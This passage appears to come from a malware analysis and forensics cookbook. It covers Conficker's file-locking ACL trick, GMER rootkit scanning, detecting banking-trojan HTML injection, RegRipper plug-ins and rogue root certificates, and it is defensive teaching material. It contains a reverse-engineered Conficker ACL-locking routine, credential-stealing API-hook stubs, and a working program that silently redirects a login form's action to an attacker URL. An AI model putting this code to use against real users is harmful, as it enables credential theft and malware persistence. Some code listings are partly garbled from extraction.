The infamous Conficker worm went one step further than Poison Ivy to prevent access to its files. It dropped a DLL into the system32 directory and then altered the file’s ACL (Access Control List) so that other processes could only execute it. Attempts to read from or write to the DLL were denied, even if made by a process running with administrative rights. This made it difficult to remove Conficker from infected machines and allowed the worm to evade some antivirus programs because they weren’t able to open the DLL in order to scan it.

To demonstrate the effect of Conficker’s ACL modifications, consider the following example. We made a copy of kernel32.dll and placed it in the root directory. This copy of kernel32.dll will simulate a Conficker binary in our example case. Using Sysinternals’ AccessChk15 tool, you can print the effective permissions for the DLL:

C:\> copy C:\WINDOWS\system32\kernel32.dll test.dll

C:\> accesschk.exe -v test.dll

 Accesschk v4.23 - Reports effective permissions for securable objects

Copyright (C) 2006-2008 Mark Russinovich

Sysinternals -


  RW BUILTIN\Administrators




  RW JASONRESACC69\Administrator


  R  BUILTIN\Users









As you can see, administrators currently have full control over the file (FILE_ALL_ACCESS). In order to change the security, Conficker adds an ACE (this stands for Access Control Entry, which is an entry in an ACL) to the DLL by calling AddAccessAllowedAce. The trick with this API function is that it does not automatically preserve existing ACEs (it is up to the programmer to copy them), so the code that follows essentially replaces all existing ACEs with a single ACE. The single ACE denies read and write access to all users, including administrators. We reverse-engineered the code as it appeared in a Conficker binary.

void SetSecurity(LPTSTR szFile)





    PSID pEveryoneSID; 

    PACL pAcl;

    DWORD nAclLength;

    int iRet = 0;

     // initialize the security descriptor 

    if (!InitializeSecurityDescriptor(




    // allocate a security identifier (SID) for the 

    // "world" or "everyone" - a group that includes 

    // all users on the system 

    if (!AllocateAndInitializeSid(&SIDAuthWorld, 



        0, 0, 0, 0, 0, 0, 0, &pEveryoneSID)) {



    // allocate memory for the ACL 

    nAclLength = GetLengthSid(pEveryoneSID) + 16;

    pAcl = (PACL) new char[nAclLength];

    if (pAcl) { 

        InitializeAcl(pAcl, nAclLength, ACL_REVISION);

        // add the access control entry that allows 

        // execution and synchronization on the object





        // associate the ACL with the security descriptor 

        SetSecurityDescriptorDacl(&pSD, TRUE, pAcl, FALSE);

        // apply the new security settings to the file

        SetFileSecurity(szFile, DACL_SECURITY_INFORMATION, &pSD);

        delete[] pAcl;





After using the function to change the security settings for test.dll, you can check the effective permissions again to see how they changed:

C:\> accesschk.exe -v test.dll

 Accesschk v4.23 - Reports effective permissions for securable objects

Copyright (C) 2006-2008 Mark Russinovich

Sysinternals -


  R  Everyone




At this point, processes can load the DLL for execution, but they cannot read from or write to it. You can verify this by attempting to read with more and write with echo, and then executing the DLL with rundll32. The parameters we passed to tasklist identify any processes with a loaded module named test.dll—this verifies that rundll32 can execute the DLL.

C:\> more < test.dll 

Access denied

 C:\> echo 1 > test.dll

Access denied 

 C:\> rundll32 test.dll,Sleep 10000

C:\> tasklist /FI "MODULES eq test.dll"

 Image Name               PID Session Name     Session#  Mem Usage

===================== ====== ================ ======== ==========

rundll32.exe            2080 Console                 0    3,164 K

Bypassing ACLs with Backup Semantics

One technique you can use to get access to the protected file without rebooting or powering down is to use backup semantics. To do this, you create a program that passes the FILE_FLAG_BACKUP_SEMANTICS in the dwFlagsAndAttributes argument to CreateFile. This special flag indicates that your process is requesting access to the file for backup or restoration purposes. Your process must have enabled the SE_BACKUP_NAME and SE_RESTORE_NAME privileges in order for this to work. As a result of these actions, your process gains super user access to the protected file, even if the ACL normally denies access. Here is an example:

HANDLE hFile = CreateFile("c:\\test.dll", 







 if (hFile != INVALID_HANDLE_VALUE) { 

    //ReadFile or WriteFile here



So you can use this method to bypass Conficker’s ACL modifications, but with one caveat—you still can’t write to the DLL as long as it’s loaded into a process. At this point, however, it’s not an ACL issue anymore; it is a DLL reference issue. What you need to do is either terminate the infected process or force it to unload the DLL. Process Hacker allows you to unload DLLs from a process, or you can create your own tool that calls FreeLibrary remotely (see Recipe 13-4). However, unloading a DLL in one of these manners is risky and could crash the process.

Bypassing ACLs with cacls.exe

Another option you can consider involves the cacls.exe utility supplied with Windows (or xcacls.exe).16 Using these tools, you can change ACLs via command line to revert the changes that Conficker made to its DLL. In particular, you can remove execute rights for all users, and then reboot the infected machine. Upon rebooting, the malware won’t be able to start running and you can successfully copy and/or delete the DLL. You can follow these steps:

1. Check the existing access. This should reflect something similar to what accesschk.exe shows.

C:\>cacls test.dll

test.dll Everyone:(special access:)



2. Remove all access from the Everyone user.

C:\>cacls test.dll /E /R Everyone

processed file: C:\test.dll

3. Add read capabilities to the Administrator user (do not add execute).

C:\>cacls test.dll /E /G Administrator:R

processed file: C:\test.dll

4. Check the existing access again to make sure your changes were successful.

C:\>cacls test.dll

C:\test.dll JASONRESACC69\Administrator:R

5. Now you can reboot the computer and the DLL will not activate, since it is no longer executable.



Recipe 10-6: Scanning for Rootkits with GMER

GMER17 from is a powerful standalone rootkit detection and removal tool. The tool currently works on Windows NT, 2000, XP, and Vista; it is able to detect a majority of the rootkits that are in the wild. Unfortunately, there’s no command-line interface to GMER, but that’s not a major drawback, considering its capabilities. Here is a summary of what it scans for:

·           Hidden processes, hidden DLLs, hidden threads, hidden kernel drivers, hidden services, hidden files, and hidden Registry keys

·           Alternate data streams

·           Import Address Table (IAT) hooks, Export Address Table (EAT) hooks, and inline hooks

·           System Service Dispatch Table (SSDT) hooks

·           Interrupt Descriptor Table (IDT) hooks

·           Hooked I/O Request Packet (IRP) routines in kernel drivers

·           Suspicious modifications of the Master Boot Record (MBR)

·           Suspicious layered drivers or attached devices

·           Drivers whose entry points land in suspicious PE sections, such as the .rsrc section. This indicates a rootkit may have patched the driver on disk.

·           Processes with mismatched section permissions (for example, an executable .rdata section)

Scanning with GMER

Figure 10-3 shows GMER’s GUI. You can right-click entries in the list of results to terminate suspicious processes, disable or delete services, and restore SSDT hooks.

Figure 10-3: Scanning a system for rootkits with GMER


Based on the output, you can make the following conclusions:

·           The malware has installed IAT hooks.

·           GMER shows the alg.exe process (PID 2324) is infected, but most likely, other processes that you can’t see in the image are also infected.

·           The malware modifies the IAT of all modules loaded in alg.exe, including ole32.dll, WS2HELP.dll, SHELL32.dll, SHLWAPI.dll, and wininet.dll.

·           The API functions hooked within these modules include GetClipboardData (for stealing clipboard contents), TranslateMessage (for stealing keystrokes), and NtQueryDirectoryFile (for hiding files).

·           The Value field indicates where calls to the hooked API functions are redirected. All values are within the range 00A1???? – 00AA????. Therefore, you can expect to find the rootkit code at those addresses in the memory of alg.exe.

·           The malware has installed a kernel driver.

·           It exploited Windows’ layered driver architecture and loaded a malicious driver into the TCP/IP stack.

·           The rootkit can monitor traffic, redirect connections, or hide backdoor connections to the victim machine.

·           The name of the malicious driver is windev-36cb-75e3.sys.

·           The malware is hiding a service.

·           The hidden service has the same name as the malicious driver, so you know the two are related.

·           You can click on the hidden entry and disable or delete the service.

·           The malware is hiding Registry keys.

·           The data that is hidden actually contains the hidden service’s configuration.

Using GMER to Explore

If you click the Files tab in GMER, you can browse through the file system at a lower level than Windows Explorer. Thus, you can see files that rootkits typically hide from Explorer and other applications that run in user mode. Of course, it may be possible to also hide from GMER, but the driver that GMER loads to access the file system ensures that you have a very good chance of finding hidden files if they exist. Figure 10-4 shows an example of the file system browser. We selected the Only hidden box and navigated to the system32 directory, which quickly narrowed down the results to four malicious files. From here, you can either copy the files to another location (like a USB drive) or delete them.

Figure 10-4: Finding and deleting hidden files


GMER’s Registry tab allows you to browse through the Registry in a similar manner to Regedit. However, using GMER, you can see keys and values that are hidden by rootkits or that you simply don’t have permission to view in normal situations (such as the SAM or protected storage system provider keys). As with files on the file system, GMER highlights hidden Registry keys in red so you can tell them apart from everything else. Figure 10-5 shows how you can edit the data for hidden value in order to disable automatically starting programs.

Figure 10-5: Finding and deleting hidden Registry keys


The following list identifies a few other anti-rootkit tools that you can use to explore how malware alters a system. Some of the tools do not have a dedicated website or may no longer be supported, but they all have very powerful rootkit detection capabilities.

·           Rootkit Unhooker18

·           IceSword19

·           Kernel Detective20

·           XueTr21

·           RootRepeal22







Recipe 10-7: Detecting HTML Injection by Inspecting IE’s DOM


You can find supporting material for this recipe on the companion DVD.

HTML injection is a common attack carried out by banking trojans such as Silent Banker, Limbo, and Zeus. This recipe presents multiple methods of performing HTML injection, describes how each method works, and shows how you can detect the presence of HTML-injecting malware on a computer.

HTML Injection

The point of an HTML injection attack is to insert extra fields into a user’s browser when he or she visits a login page (usually for a banking site, social networking site, or webmail site). To the end user, the extra fields appear legitimate because they blend in with the rest of the login form. Consider the two images in Figure 10-6, for example. The image on the left is from a clean system and the image on the right is from an infected system. The extra field requests a user’s PIN, which to some users may not seem out of the ordinary, especially if their financial institution is asking over an SSL-protected connection. After a user fills out the form and clicks Go, the malware extracts the credentials from the page along with the additional PIN.

Figure 10-6: HTML injection attacks trick users into entering extra information


Note HTML injection does not always produce a visual change on the target website, as portrayed in Figure 10-6. In the next example discussed shortly, it just replaces the HTML form action so that the browser sends credentials to an attacker’s server instead.

HTML Injection with MITM

HTML injection can be done with a traditional MITM (man-in-the-middle) attack, where a malicious host positions itself on the network between the web server and the victim’s computer. This position enables the attacker to replace or insert data into the server’s response before it reaches the victim. Because of the complexities involving SSL and the requirement of a unique network standpoint, the traditional MITM attack is least common. There are two more prevalent methods, which include API hooking and IE DOM modification.

HTML Injection with API Hooking

Recipe 9-8 explained how you can create DLLs that hook API functions. This is similar in concept to what malware authors use to hook APIs, except they use different hooking libraries. The usual suspects in terms of which functions to hook are InternetReadFile and HttpSendRequest. Internet Explorer calls InternetReadFile to fetch a specified number of bytes from the server’s reply and then displays it in the browser. Thus, by hooking this function, malware can alter the reply before it is presented to the user.

In the other direction, HttpSendRequest sends a request containing an optional POST payload to the web server. By hooking this function, malware can extract credentials from the POST payload. It doesn’t matter if a user visits the HTTPS (SSL-protected) version of a login page because InternetReadFile receives data after decryption and HttpSendRequest receives data before encryption. Therefore, the malware can see everything in the clear. The code that follows shows an example of how malware utilizes API hooks to perform HTML injection.

BOOL Hook_InternetReadFile(

  __in   HINTERNET hFile,

  __out  LPVOID lpBuffer,

  __in   DWORD dwNumberOfBytesToRead,

  __out  LPDWORD lpdwNumberOfBytesRead)


    // call the real function first 

    BOOL bRet = True_InternetReadFile(





    DWORD dwErr = GetLastError();

     // is the user visiting a targeted site?

    if (IsTarget(hInet)) { 

     // we don't actually define this function, but 

     // theoretically it modifies data in the lpBuffer 

     // value (pointer to HTTP/HTTPS reply) and then 

     // fixes up the lpdwNumberOfBytesRead value to 

     // reflect any changes in the buffer's size 






    return bRet;


 BOOL Hook_HttpSendRequestA(

  __in  HINTERNET hRequest,

  __in  LPCTSTR lpszHeaders,

  __in  DWORD dwHeadersLength,

  __in  LPVOID lpOptional,

  __in  DWORD dwOptionalLength)

    if (IsTarget(hRequest) &&   // visiting a targeted site?

        lpOptional != NULL &&   // a POST payload exists

        dwOptionalLength > 0)   // a POST payload exists


     // we don't actually define this function, but 

     // theoretically it scans the POST payload for 

     // the user's login name, password, and answers

     // to any extra fields inserted into the page 

     // by the InternetReadFile hook. it will optionally

     // allocate a new buffer for the lpOptional data

     // that doesn't contain the extra fields before

     // calling the real HttpSendRequestA function so 

     // that the legit web server doesn't see extraneous 

     // fields, which could indicate HTML injection 






     // call the real function 

    return True_HttpSendRequestA(







HTML Injection with IE DOM Modification

Internet Explorer’s DOM (Document Object Model) is commonly exploited by malware for many purposes. As you might have guessed, HTML injection is one of those purposes. You can think of the DOM as a collection of elements that make up a web page. Each element of the page, such as an individual link, form, anchor, text box, or table, can be manipulated using special interfaces. After “connecting” to the DOM of a given browser instance (discussed in just a moment), the malicious code can do things like monitor all URLs the user visits, force the browser to POST data to an attacker-controlled site, and remove columns from HTML tables to hide transactions on online balance statements.

The two interfaces that are most relevant to manipulating the DOM are IWebBrowser223 and IHTMLDocument2.24 Malware can access these interfaces by loading a DLL into Internet Explorer (for example, as a Browser Helper Object) or from a separate process that does not need to inject code into IE. To demonstrate how it all works, we created a simple login page using the following HTML and placed it at (1234 is just an example):

<table width="300" align="center">


<form method="POST" action="checklogin.php">


<table width="100%">


<td colspan="2"><b>Member Login</b></td>




<td><input name="user" type="text"></td>




<td><input name="pass" type="text"></td>



<td> </td>

<td><input type="submit" name="Submit" value="Login"></td>







As you can see, the form’s method is POST and its action is checklogin.php. An attacker may want to override the form’s action so that the browser sends credentials to an attacker-controlled site when the user clicks the Login button. The following code shows one method of accomplishing this task. Once active on a victim’s machine, the program waits for the user to visit and then it drills down to the form element using the DOM interfaces. It changes the form action to, which completes the injection.

int main(void)


    HRESULT hr;

    IShellWindows *shell;

    IDispatch *folder;

    IDispatch *html;

    IWebBrowser2 *browser;

    IHTMLDocument2 *doc;

    LONG Count;

    VARIANT vIndex;

    BOOL bDone = FALSE;






     // wait forever until the user visits a target page

    while(1) {

         // get a pointer to IShellWindows interface

        hr = CoCreateInstance(CLSID_ShellWindows, 

            NULL, dwFlags,

            IID_IShellWindows, (void **)&shell);

         if (hr != S_OK) {

            printf("CoCreateInstance failed: 0x%x!\n", hr);



         // loop through all existing windows 


        for(int i=0; i<Count; i++)



            vIndex.vt = VT_I4;

            vIndex.lVal = i;

             hr = shell->Item(vIndex, (IDispatch **)&folder);

            if (hr != S_OK || !folder) {



             // try to get an IWebBrowser2 interface 

            hr = folder->QueryInterface(IID_IWebBrowser2, 

                                       (void **)&browser);

            if (hr != S_OK || !browser) {




             // if the user visited a target page, wait for it to 

            // finish loading, derive an IHTMLDocument2 interface 

            // from the browser, then attempt the HTML injection. 

            if (IsReadyTarget(browser)) { 

                hr = browser->get_Document((IDispatch**)&html);

                if (hr == S_OK && html) {

                    hr = html->QueryInterface(IID_IHTMLDocument2, 


                    if (hr == S_OK && doc) {

                        bDone = ReplaceForms(doc);









        // if we succeeded, exit the loop

        if (bDone) break;




    return 0;


 // this function returns true if the user visited 

// a target website and if the page is done loading

BOOL IsReadyTarget(IWebBrowser2 *browser)


    HRESULT      hr;


    BSTR         bstrUrl;

    BOOL         bRet = FALSE;

    LPWSTR szTarget = L"";

     // we only care about visible browsers 


    if (!vBool) 

        return FALSE;

    // get the visited URL

    hr = browser->get_LocationURL(&bstrUrl);

    if (hr != S_OK || !bstrUrl) 

        return FALSE;

     // check the URL and wait for it to load

    if (wcsstr((LPCWSTR)bstrUrl, szTarget) != NULL) {

        do {



        } while (vBool);

        bRet = TRUE;



    return bRet;


 BOOL ReplaceForms(IHTMLDocument2 *doc)


    HRESULT hr;

    IHTMLElementCollection *forms;

    IHTMLFormElement *element;

    IDispatch *theform;

    VARIANT vEmpty;

    VARIANT vIndexForms;

    LONG CountForms;

    BOOL bRet = FALSE;

    BSTR bstrEvil = SysAllocString(L"");

     // query for the doc's forms

    hr = doc->get_forms((IHTMLElementCollection**)&forms);

     if (hr != S_OK || !forms) 

        return FALSE;

     // loop for each form in the doc


    for (int j=0; j<CountForms; j++)




        vIndexForms.vt = VT_I4;

        vIndexForms.lVal = j;

         // get the form 

        hr = forms->item(vIndexForms, vEmpty, (IDispatch**)&theform);

        if (hr != S_OK || !theform) {



        // get the form element 

        hr = theform->QueryInterface(IID_IHTMLFormElement, 


        if (hr == S_OK && element) {

            // replace the form action with a malicious URL 

            hr = element->put_action(bstrEvil);

            if (hr == S_OK) { 

                bRet = TRUE;








    return bRet;


Detecting HTML Injection on Live Machines

API hooking is a simple and effective approach to HTML injection, but it is easy to detect. Any anti-rootkit scanner can list which functions are hooked, and there aren’t many legitimate reasons to hook InternetReadFile and HttpSendRequest. DOM modification is a bit trickier because it doesn’t hook any functions. That said, regardless of whether malware uses API hooking or DOM modification, the changes (injected HTML) are only reflected in the memory of the browser process. If the browser caches the web page, then there will be a file in the Temporary Internet Files folder that contains an original copy of the page content.

Take a look at Figure 10-7, which shows the appearance of a browser after conducting the DOM modification attack. If you choose View ⇒ Source in the browser, IE accesses the cached page from disk rather than from memory. Therefore, by viewing the HTML source in this manner, you cannot tell if the browser’s view of the page has been altered. Notice how the source still indicates that the form will POST data to checklogin.php.

To detect HTML injection, we developed a tool that you can find on the book’s DVD named HTMLInjectionDetector.exe. It works in the following manner:

1. You run HTMLInjectionDetector.exe on a machine you suspect to be infected. Call it from the command line and pass it a text file that contains the list of websites that you want to check.

2. The program starts a new Internet Explorer process for each website, navigates to the specified URL, and waits for the URL you specified to finish loading. It waits an additional few seconds to let any malware on the system perform the HTML injection.

Figure 10-7: When you view the source in IE, the content comes from the cache file.


3. The program accesses the browser’s DOM (using the same APIs as shown in the sample malicious program), but instead of making modifications, it just dumps a copy of the page’s contents to a file. The file will exist in your working directory with a _dom.txt extension.

4. The program checks to see if the browser cached a copy of the page for your specified URL using the GetUrlCacheEntryInfo API. If so, it copies the cached file from the Temporary Internet Files folder to your working directory with a _cache.txt extension.

5. The program takes a screenshot of the IE window and saves it in your working directory (so you can see how the HTML appeared in a browser).

Here is an example of how to use the HTMLInjectionDetector.exe program:

C:\>HTMLInjectionDetector.exe –h 

 Usage: HTMLInjectionDetector.exe [OPTIONS]


  -h           show this message and exit

  -f <FILE>    text file with URLs to check

  -s           save screen shots (default=no)

 [ERROR] You must supply a file with URLs!

 C:\>echo > urls.txt

 C:\>HTMLInjectionDetector.exe –f urls.txt –s

 Requested URL:

Redirect URL:

Navigate completed. Waiting 3 seconds.

Dumped 425 bytes of page content to www.1234.org_dom.txt

Cache file: C:\Documents and Settings\Administrator\

   Local Settings\Temporary Internet Files\Content.IE5\Z7N9YX3C\login[1].htm

Copied to: www.1234.org_cache.txt

Saved BMP to

Now you should have the following three files:

·           www.1234.org_dom.txt: A copy of the HTML as displayed in the IE browser

·           www.1234.org_cache.txt: A copy of the HTML as originally returned by the web server

·  A screen shot of the browser’s display of the visited URL

Figure 10-8 shows that you can easily determine modifications to the page by exploring the contents of the files.

Figure 10-8: Comparing the DOM and cached file view shows a discrepancy.


As we have shown, even if you know exactly how a website should appear in your browser, and if you double-check the validity of form actions and other page variables by viewing the page source, there’s still a possibility that malware could have modified the browser. The attack that we conducted for demonstration purposes is obviously just a proof-of-concept. If attackers replaced forms on an HTTPS website so that it POSTs data to an HTTP website, the user would likely see a prompt or warning. However, we’ve also seen malware that disables such warnings by setting the error mode in Internet Explorer.



Registry Analysis

In our opinion, the Registry is like an ocean—no one person has, or ever will, explore it all. However, slowly but surely, in conjunction with others in the community, you can identify key locations in the Registry to search for artifacts left by intruders and malicious code. The next few recipes show you some of the tools and techniques that you can add to your arsenal of knowledge about the Registry.

Recipe 10-8: Registry Forensics with RegRipper Plug-ins


You can find supporting material for this recipe on the companion DVD.

Harlan Carvey’s RegRipper25 is a Registry forensics framework that allows you to quickly extract keys, values, data, and timestamps from an offline hive file. It is written in Perl and based on the Parse::Win32Registry module by James McFarlane. RegRipper is very different from a Registry viewer/editor such as Regedit. For one, RegRipper is not intended to work against a live system’s Registry hives. You must first copy off the Registry hives from a suspect system in order to examine them with RegRipper. Second, in Harlan’s own words, you wouldn’t use RegRipper to leisurely “look around” in the Registry. Instead, RegRipper is based on plug-ins that are hard-coded to extract data from specific locations.

RegRipper Plug-ins

RegRipper comes with over 75 plug-ins. To get a list of available plug-ins, just call on the command line with the –l flag. For the sake of brevity, we’re not going to list them all, however, Table 10-1 shows a few that we think are especially useful in malware-related investigations.

Table 10-1: A Few RegRipper Plug-ins

Plug-in Name





Prints the contents of the AppInit_DLLs value. Any DLLs listed here automatically load into GUI applications (more specifically, into any processes that load user32.dll).



Prints details on the installed Browser Helper Objects (modules that load into Internet Explorer)



Prints details on the Windows host firewall



Prints information on the Image File Execution Options, which malware often sets to disable antivirus programs. For a reference, see the malware we analyzed in Recipe 9-3.



Dumps the entire hive and sorts the keys by LastWrite timestamp



Lists details of installed services, including the path to the service binary



Prints information on the automatically starting applications



Prints the contents of the Userinit value (Zeus modifies this value with a path to its own executable so that it launches after winlogon.exe but before Explorer.exe.)

Note Because RegRipper is written in Perl, you can use it on any platform where Perl runs. Harlan also provides compiled Windows executables (rip.exe) for use on Windows systems without a Perl interpreter.

The following examples should give you a solid idea of how to use RegRipper and how to start writing your own plug-ins. You can find the full source code for all plug-ins in this recipe (and a few additional ones) on the book’s DVD. Just place them in your “plugins” directory to make them available to

Viewing Static Routes

This example, the simplest case, shows how to enumerate values in a key. The objective is to investigate malware that modifies a system’s IP routing table. Some samples we’ve seen in the past dropped and executed a batch file containing several hundred route add commands like this:

route –p add mask 

By default, routes added with the route command are not preserved when the TCP/IP protocol is restarted. To change this behavior, the attackers used the –p flag, which makes the routes persistent. In this case, the routing information is saved in the Registry and will initialize each time TCP/IP starts. To see if any persistent routes have been set on your suspect system, you can look in the system hive under the following key: HKLM\System\ControlSet001\Services\Tcpip\Parameters\PersistentRoutes. The name of each value under this key is a comma-separated list in the format network,netmask,gateway,metric.

The following code shows the body of the plug-in that extracts data regarding persistent routes.

sub pluginmain {

    my $class = shift;

    my $hive = shift;

    ::logMsg("Launching routes v.".$VERSION);

    my $reg = Parse::Win32Registry->new($hive);

    my $root_key = $reg->get_root_key;

     my $key_path = \


    my $key;

    if ($key = $root_key->get_subkey($key_path)) {



     ::rptMsg("LastWrite Time ".gmtime($key->get_timestamp())." (UTC)");


     my @vals = $key->get_list_of_values();

     foreach my $v (@vals) {

             my $name = $v->get_name();

             my @f = split(/,/, $name);

             ::rptMsg("$f[0] mask $f[1] gateway $f[2] metric $f[3]");



    else {

     ::rptMsg($key_path." not found.");

     ::logMsg($key_path." not found.");



The commands that follow provide an example of using the routes plug-in. When you see persistent routes, don’t immediately deem the machine infected, because they could be legitimate. Use one of the techniques for researching IPs and networks from Chapter 5 and determine if the machine with the routes has any business communicating with the remote systems.

perl -r system -p routes

Launching routes v.20100809



LastWrite Time Tue Jun 22 15:02:22 2010 (UTC)

 xx.140.225.0 mask gateway metric 1

xx.236.0.0 mask gateway metric 1

xx.23.206.0 mask gateway metric 1

xx.191.13.0 mask gateway metric 1

xx.184.71.0 mask gateway metric 1

xx.12.57.0 mask gateway metric 1

xx.102.130.0 mask gateway metric 1

Examining Pending Deletions

This example shows how to handle special cases where the Registry value’s data contains multiple NULL-terminated strings.

Malware often watches over its files and re-creates them if you, or antivirus programs, try to remove them from the disk. If you’re trying to disinfect a system, but the file just won’t go away, you can ask the system to automatically delete it at the next reboot. To do this, pass MOVEFILE_DELAY_UNTIL_REBOOT as the dwFlags parameter to MoveFileEx, and leave the name of the new file NULL, like this:


    "C:\\Temp\\dropper.exe",       // lpExistingFileName

    NULL,                          // lpNewFileName



MoveFileEx adds the file name(s) to a Registry value in the System hive. In particular, it adds them to the PendingFileRenameOperations value under HKLM\System\ControlSet001\Control\Session Manager. At the next reboot, the session manager (smss.exe) queries the Registry value and deletes (or moves) any files that it finds. Because smss.exe is the first user mode process to begin running, it can complete the actions without interference from other processes (keep in mind that kernel drivers can load before smss.exe and cause interference).

Note The Sysinternals tool movefile.exe allows you to delete files using the special parameter to MoveFileEx, and pendmoves.exe allows you to query for any files pending deletion. However, these tools only work on a live Windows system.

As you may have guessed, malware exploits MoveFileEx for its own purposes—typically to get rid of temporary files that it dropped or downloaded. If you encounter a machine that hasn’t been rebooted since the infection, you can examine the PendingFileRenameOperations value for evidence. The data type for this value is REG_MULTI_SZ, which is a series of NULL-terminated strings. Each call to MoveFileEx will result in two strings being added to the value. The first string is the original file name. The second string is the destination file name. If the original file is to be deleted, then the destination file name is an empty string.

The following code shows the body of the plug-in that parses the PendingFileRenameOperations value:

sub pluginmain {

    my $class = shift;

    my $hive = shift;

    ::logMsg("Launching pendingdelete v.".$VERSION);

    my $reg = Parse::Win32Registry->new($hive);

    my $root_key = $reg->get_root_key;

     my $key_path = 'ControlSet001\Control\Session Manager';

    my $key;

    if ($key = $root_key->get_subkey($key_path)) {



     ::rptMsg("LastWrite Time ".gmtime($key->get_timestamp())." (UTC)");


     my $data = 


        my @strings = split(/ /, $data);

        for my $s (0..(scalar(@strings)/2)-1) {

            my $src = $strings[$s*2];

            my $dst = $strings[($s*2)+1];

            $dst = "{delete}" if $dst eq "";

            ::rptMsg("[$s] $src => $dst");



    else {

     ::rptMsg($key_path." not found.");

     ::logMsg($key_path." not found.");



Here is an example of using the pending delete plug-in on an infected machine:

perl -r system.bin -p pendingdelete

Launching pendingdelete v.20100809


ControlSet001\Control\Session Manager

LastWrite Time Tue Jun 22 15:20:09 2010 (UTC)

 [0] \??\C:\WINDOWS\system32\e7s1.exe => {delete}

[1] \??\C:\WINDOWS\system32\7di2.dll => {delete}

[2] \??\C:\WINDOWS\system32\b9d9.dll => {delete}

[3] \??\C:\WINDOWS\TEMP\PRAGMAa3ad.tmp => {delete}

[4] \??\C:\WINDOWS\TEMP\PRAGMAfbfe.tmp => {delete}

As the output shows, five files are scheduled to be deleted at the next reboot. You can use this information to find and copy the files off the victim machine or use it to check other machines if they have similarly named files.

Viewing ShellExecute Extensions

This example shows how to correlate values across Registry keys. The objective is to investigate malware that injects code into other processes by using ShellExecute extensions. The ShellExecute API is similar to CreateProcess in that it can be used to start a new process. Instead of passing ShellExecute the path to an executable, however, you can pass it the path of a file such as C:\info.txt. ShellExecute looks up the default application for handling files with a .txt extension and launches Notepad. In fact, every time you double-click something from Explorer, it results in a call to ShellExecute.

ShellExecute extensions are implemented as DLLs. The DLLs contain user-defined routines for special handling of the objects to be opened or executed. If you click Start ⇒ Run and then enter, the process calling ShellExecute (Explorer in this case) loads your DLL to implement the special handling. Most systems have at least one preinstalled extension that opens a web browser if the object begins with “http:”.

Many malware families install their own ShellExecute extensions just to get a DLL injected into Explorer (and any other process that calls ShellExecute). They perform the install by registering a class ID (CLSID) and then writing the CLSID to a value in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks. The value is a REG_SZ type and it may or may not have any data (data is optional).

The following code shows the plug-in that enumerates the ShellExecute extensions and then looks up the corresponding CLSID under HKLM\Software\Classes\CLSID. This way, you can also print the DLL associated with the extension.

sub getclsid {

    my $root_key = shift;

    my $name = shift;

    my $clsid_path = "Classes\\CLSID\\".$name;

    my $clsid; 

    if ($clsid = $root_key->get_subkey($clsid_path)) {

        my $mod = 



        my $default = $clsid->get_value("");

        my $desc = "{empty}";

        if ($default) { 

            $desc = $default->get_data();


        ::rptMsg("Description: $desc");

        ::rptMsg("Module: $mod");

    } else { 

        ::rptMsg($clsid_path." not found.");




 sub pluginmain {

    my $class = shift;

    my $hive = shift;

    ::logMsg("Launching shellexecutehooks v.".$VERSION);

    my $reg = Parse::Win32Registry->new($hive);

    my $root_key = $reg->get_root_key;

     my $key_path = 'Microsoft\\Windows\\CurrentVersion


    my $key;

    if ($key = $root_key->get_subkey($key_path)) {



       ::rptMsg("LastWrite Time ".gmtime($key->get_timestamp()));


       my @vals = $key->get_list_of_values();

       foreach my $v (@vals) {

         my $name = $v->get_name();

         my $data = $v->get_data();

         $data = "{empty}" if $data eq "";

         ::rptMsg("$name: $data");

         getclsid($root_key, $name);



    } else {

         ::rptMsg($key_path." not found.");

         ::logMsg($key_path." not found.");



The following example shows how to use the plug-in. The first entry for shell32.dll with the description of URL Exec Hook is the legitimate http handler. The second entry for softqq0.dll with description hook dll rising is malicious. This is actually interesting because the attackers didn’t need a description (remember, that’s optional), but they entered one anyway. Not only did they add a description, but it is hardly a stealthy one with the value hook dll rising! Microsoft calls this family of malware Taterf.26

perl -r software.bin -p shellexecutehooks

Launching shellexecutehooks v.20100809



LastWrite Time Tue Jun 22 16:45:18 2010 (UTC)

 {AEB6717E-7E19-11d0-97EE-00C04FD91972}: {empty}

Description: URL Exec Hook

Module: shell32.dll

 {B03A4BE6-5E5A-483E-B9B3-C484D4B20B72}: hook dll rising

Description: {empty}

Module: C:\WINDOWS\system32\softqq0.dll

As you can see, RegRipper can save you a ton of time during investigations. In fact, the only thing better than a collection of Registry keys/values commonly altered by malware is the ability to check all those locations with one or two commands. See Recipe 18-7 for how to use RegRipper on memory dumps.



Recipe 10-9: Detecting Rogue-Installed PKI Certificates


You can find supporting material for this recipe on the companion DVD.

Public key infrastructure (PKI) establishes trust on the Internet. When you visit an SSL website, your browser checks if the site’s certificate is legitimate by making sure it is signed by a certificate authority (CA) trusted by your browser. To do this, your browser gets the appropriate CA’s public key from your computer’s Registry and performs the validation. Malware can exploit this trust model by installing its own CA certificate that the attackers created so that your computer trusts illegitimate websites. This recipe shows you how to extract certificates from a Registry hive and use OpenSSL for verification.


Sophos has an excellent write-up27 about a malware sample they call TROJ/BHO-QP that installs a fake CA certificate. In the article, they describe how the malware authors performed the following steps:

1. Created a fake VeriSign code signing certificate

2. Used the fake VeriSign certificate to issue a fake Microsoft certificate

3. Signed a malicious DLL with the fake Microsoft certificate

4. Installed the DLL as a Browser Helper Object (BHO) for Internet Explorer on the victim’s machine

5. Installed the fake VeriSign certificate as a trusted root CA on the victim’s machine

As a result of these actions, the victim computer has complete trust in the malicious DLL because it appears to have been signed by Microsoft.

Note If you’re looking for good books on cryptography, we recommend Practical Cryptography by Niels Ferguson and Bruce Schneier for beginners and Applied Cryptography by Bruce Schneier for more advanced readers.

Certificate Registry Entries

Windows stores certificates in several different places in the Registry. Microsoft documented these locations for Windows 2000, XP, and Server 2003 (the locations also apply to Windows 7) in a TechNet article called “Certificates Tools and Settings.”28 The locations of most interest are HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates and HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates. Under these keys, you’ll find the following subkeys:

·           AuthRoot: Non-Microsoft root CA certs

·           ROOT: Trusted root CA certs

·           CA: Intermediate CA certs

·           Disallowed: Rejected or untrustworthy certs

·           trust: Enterprise trust certs

·           TrustedPublisher: Certs explicitly accepted as trusted

·           MY: User’s personal certs

